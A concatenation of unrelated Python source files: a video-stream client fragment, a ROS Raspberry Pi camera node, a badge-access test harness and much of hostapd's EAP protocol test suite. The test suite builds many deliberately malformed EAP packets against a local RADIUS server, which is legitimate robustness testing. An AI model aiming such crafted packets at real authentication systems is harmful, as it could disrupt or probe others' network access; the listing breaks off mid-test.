if key == ord('q') or not watching:
main_logger.info("Leaving the Stream")
client_socket.sendall(b"LEAVING")
break
frames_processed_counter += 1
except struct.error as e:
# Handle case when server stops sending data, i.e. stream ended
if len(packed_msg_size) == 0:
main_logger.info("Stream has ended")
else:
raise e
except ConnectionResetError as e:
if e.errno == errno.ECONNRESET:
main_logger.info("Stream has ended")
else:
raise e
except BrokenPipeError as e:
if e.errno == errno.EPIPE:
main_logger.info("Stream may have ended, or connection dropped.")
else:
raise e
finally:
client_socket.close()
|
camera_rpi_2.py | #!/usr/bin/env python
from __future__ import print_function
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage
from imutils.video.pivideostream import PiVideoStream
import argparse
import imutils
from picamera.array import PiRGBArray
from picamera import PiCamera
import time, cv2, sys
import numpy as np
from threading import Thread
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=60):
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
self.frame = None
self.stopped = False
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
for f in self.stream:
self.frame = f.array
self.rawCapture.truncate(0)
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
return self.frame
def stop(self):
self.stopped = True
def main(args):
rospy.init_node('camera_rpi', anonymous=True)
image_pub = rospy.Publisher("image",Image, queue_size=1)
image_pub_compressed = rospy.Publisher("image/compressed",CompressedImage,queue_size=1)
bridge = CvBridge()
print("Starting Camera Node")
camera_stream = PiVideoStream().start()
time.sleep(2.0)
# limit publish frame rate
r = rospy.Rate(60)
while not rospy.is_shutdown():
start_time = time.time()
frame = camera_stream.read()
#frame = imutils.resize(frame, width=400)
#print("--- %s camera capture seconds ---" % (time.time() - start_time))
ros_start_time = time.time()
#image_pub.publish(bridge.cv2_to_imgmsg(frame, encoding="bgr8"))
## Create compressed image message
msg = CompressedImage()
msg.header.stamp = rospy.Time.now()
msg.format = "jpeg"
msg.data = np.array(cv2.imencode('.jpg', frame)[1]).tostring()
## publish compressed image
image_pub_compressed.publish(msg)
#print("--- %s ros seconds ---" % (time.time() - ros_start_time))
r.sleep()
if __name__ == '__main__':
main(sys.argv)
|
VirtualDevice.py | from __future__ import absolute_import
import sys
import time
import threading
import serial
import smbus2 as smbus
from mock import patch, Mock
from tinker_access_client.tinker_access_client.Client import Client
from tinker_access_client.tinker_access_client.ClientOption import ClientOption
from tests.integration.utils.VirtualRpi import VirtualRpi
from tinker_access_client.tests.integration.utils.VirtualSerial import VirtualSerial
update_status = Client.update_status
class VirtualDevice(object):
def __init__(self, opts):
self.__opts = opts
self.__displays = []
self.__client = None
self.__transitions = []
self.__virtual_rpi = VirtualRpi(opts)
self.__virtual_serial = VirtualSerial()
self.__lcd_patcher = patch.object(smbus, 'SMBus', return_value=Mock())
self.__lcd_patcher.start()
#TODO: should only patch if the address, matches the option for the serial address
self.__serial_patcher = patch.object(serial, 'Serial', return_value=self.__virtual_serial)
self.__serial_patcher.start()
self.__client__update_status = patch.object(Client, 'update_status', side_effect=self.__update__status, autospec=True)
self.__client__update_status.start()
def __update__status(self, *args, **kwargs):
self.__client = args[0]
self.__transitions.append(self.__client.status())
update_status(self.__client, *args, **kwargs)
def __enter__(self):
sys.meta_path.append(self.__virtual_rpi)
def run():
Client.run(self.__opts, [])
t = threading.Thread(target=run)
t.daemon = True
t.start()
time.sleep(1)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.__client__update_status.stop()
self.__serial_patcher.stop()
self.__lcd_patcher.stop()
[sys.meta_path.remove(meta) for meta in sys.meta_path if meta is self.__virtual_rpi]
def transitions(self):
return self.__transitions
def status(self):
return self.__client.status() if self.__client is not None else None
def scan_badge(self, badge_code):
self.__virtual_serial.scan_badge(badge_code)
def hold_logout(self, hold_time=None):
pin_logout = self.__opts.get(ClientOption.PIN_LOGOUT)
hold_time = hold_time if hold_time is not None else 0.5
self.__virtual_rpi.write_pin(pin_logout, True)
def reset_pin():
time.sleep(hold_time)
self.__virtual_rpi.write_pin(pin_logout, False)
t = threading.Thread(target=reset_pin)
t.daemon = True
t.start()
def read_pin(self, pin):
return self.__virtual_rpi.read_pin(pin)
|
test_eap_proto.py | # EAP protocol tests
# Copyright (c) 2014-2015, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import threading
import time
import hostapd
from utils import HwsimSkip, alloc_fail, fail_test, wait_fail_trigger
from test_ap_eap import check_eap_capa, check_hlr_auc_gw_support, int_eap_server_params
from test_erp import check_erp_capa
try:
import OpenSSL
openssl_imported = True
except ImportError:
openssl_imported = False
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
EAP_CODE_INITIATE = 5
EAP_CODE_FINISH = 6
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NOTIFICATION = 2
EAP_TYPE_NAK = 3
EAP_TYPE_MD5 = 4
EAP_TYPE_OTP = 5
EAP_TYPE_GTC = 6
EAP_TYPE_TLS = 13
EAP_TYPE_LEAP = 17
EAP_TYPE_SIM = 18
EAP_TYPE_TTLS = 21
EAP_TYPE_AKA = 23
EAP_TYPE_PEAP = 25
EAP_TYPE_MSCHAPV2 = 26
EAP_TYPE_TLV = 33
EAP_TYPE_TNC = 38
EAP_TYPE_FAST = 43
EAP_TYPE_PAX = 46
EAP_TYPE_PSK = 47
EAP_TYPE_SAKE = 48
EAP_TYPE_IKEV2 = 49
EAP_TYPE_AKA_PRIME = 50
EAP_TYPE_GPSK = 51
EAP_TYPE_PWD = 52
EAP_TYPE_EKE = 53
EAP_TYPE_EXPANDED = 254
# Type field in EAP-Initiate and EAP-Finish messages
EAP_ERP_TYPE_REAUTH_START = 1
EAP_ERP_TYPE_REAUTH = 2
EAP_ERP_TLV_KEYNAME_NAI = 1
EAP_ERP_TV_RRK_LIFETIME = 2
EAP_ERP_TV_RMSK_LIFETIME = 3
EAP_ERP_TLV_DOMAIN_NAME = 4
EAP_ERP_TLV_CRYPTOSUITES = 5
EAP_ERP_TLV_AUTHORIZATION_INDICATION = 6
EAP_ERP_TLV_CALLED_STATION_ID = 128
EAP_ERP_TLV_CALLING_STATION_ID = 129
EAP_ERP_TLV_NAS_IDENTIFIER = 130
EAP_ERP_TLV_NAS_IP_ADDRESS = 131
EAP_ERP_TLV_NAS_IPV6_ADDRESS = 132
def run_pyrad_server(srv, t_stop, eap_handler):
srv.RunWithStop(t_stop, eap_handler)
def start_radius_server(eap_handler):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
eap = ""
for p in pkt[79]:
eap += p
eap_req = self.eap_handler(self.ctx, eap)
reply = self.CreateReplyPacket(pkt)
if eap_req:
while True:
if len(eap_req) > 253:
reply.AddAttribute("EAP-Message", eap_req[0:253])
eap_req = eap_req[253:]
else:
reply.AddAttribute("EAP-Message", eap_req)
break
else:
logger.info("No EAP request available")
reply.code = pyrad.packet.AccessChallenge
hmac_obj = hmac.new(reply.secret)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_stop, eap_handler):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_stop = t_stop
self.eap_handler = eap_handler
self.ctx = {}
while not t_stop.is_set():
for (fd, event) in self._poll.poll(200):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_stop = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_stop, eap_handler))
t.start()
return { 'srv': srv, 'stop': t_stop, 'thread': t }
def stop_radius_server(srv):
srv['stop'].set()
srv['thread'].join()
def start_ap(ifname):
params = hostapd.wpa2_eap_params(ssid="eap-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(ifname, params)
return hapd
def test_eap_proto(dev, apdev):
"""EAP protocol tests"""
check_eap_capa(dev[0], "MD5")
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 2")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 3")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 2, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('B'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('C'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('D'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('E'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request (same id)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'] - 1,
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('F'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 2, 4)
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION A":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION B":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION C":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION D":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION E":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION F":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_notification_errors(dev, apdev):
"""EAP Notification errors"""
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
with alloc_fail(dev[0], 1, "eap_sm_processNotify"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;sm_EAP_NOTIFICATION_Enter"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
EAP_SAKE_VERSION = 2
EAP_SAKE_SUBTYPE_CHALLENGE = 1
EAP_SAKE_SUBTYPE_CONFIRM = 2
EAP_SAKE_SUBTYPE_AUTH_REJECT = 3
EAP_SAKE_SUBTYPE_IDENTITY = 4
EAP_SAKE_AT_RAND_S = 1
EAP_SAKE_AT_RAND_P = 2
EAP_SAKE_AT_MIC_S = 3
EAP_SAKE_AT_MIC_P = 4
EAP_SAKE_AT_SERVERID = 5
EAP_SAKE_AT_PEERID = 6
EAP_SAKE_AT_SPI_S = 7
EAP_SAKE_AT_SPI_P = 8
EAP_SAKE_AT_ANY_ID_REQ = 9
EAP_SAKE_AT_PERM_ID_REQ = 10
EAP_SAKE_AT_ENCR_DATA = 128
EAP_SAKE_AT_IV = 129
EAP_SAKE_AT_PADDING = 130
EAP_SAKE_AT_NEXT_TMPID = 131
EAP_SAKE_AT_MSK_LIFE = 132
def test_eap_proto_sake(dev, apdev):
"""EAP-SAKE protocol tests"""
global eap_proto_sake_test_done
eap_proto_sake_test_done = False
def sake_challenge(ctx):
logger.info("Test: Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_SAKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype (different session id)")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 1, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with truncated attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute header")
payload = struct.pack("B", EAP_SAKE_AT_ANY_ID_REQ)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with AT_IV but not AT_ENCR_DATA")
payload = struct.pack("BB", EAP_SAKE_AT_IV, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with skippable and non-skippable unknown attribute")
payload = struct.pack("BBBB", 255, 2, 127, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_RAND_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_RAND_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MIC_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_MIC_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PERM_ID_REQ with invalid payload length")
payload = struct.pack("BBBBBBBBBBBBBB",
EAP_SAKE_AT_SPI_S, 2,
EAP_SAKE_AT_SPI_P, 2,
EAP_SAKE_AT_ENCR_DATA, 2,
EAP_SAKE_AT_NEXT_TMPID, 2,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0, 0,
EAP_SAKE_AT_PERM_ID_REQ, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PADDING")
payload = struct.pack("BBBBBB",
EAP_SAKE_AT_PADDING, 3, 0,
EAP_SAKE_AT_PADDING, 3, 1)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MSK_LIFE")
payload = struct.pack(">BBLBBH",
EAP_SAKE_AT_MSK_LIFE, 6, 0,
EAP_SAKE_AT_MSK_LIFE, 4, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with invalid attribute length")
payload = struct.pack("BB", EAP_SAKE_AT_ANY_ID_REQ, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, 123)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype with too short AT_RAND_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 2)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with too short AT_MIC_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with incorrect AT_MIC_S")
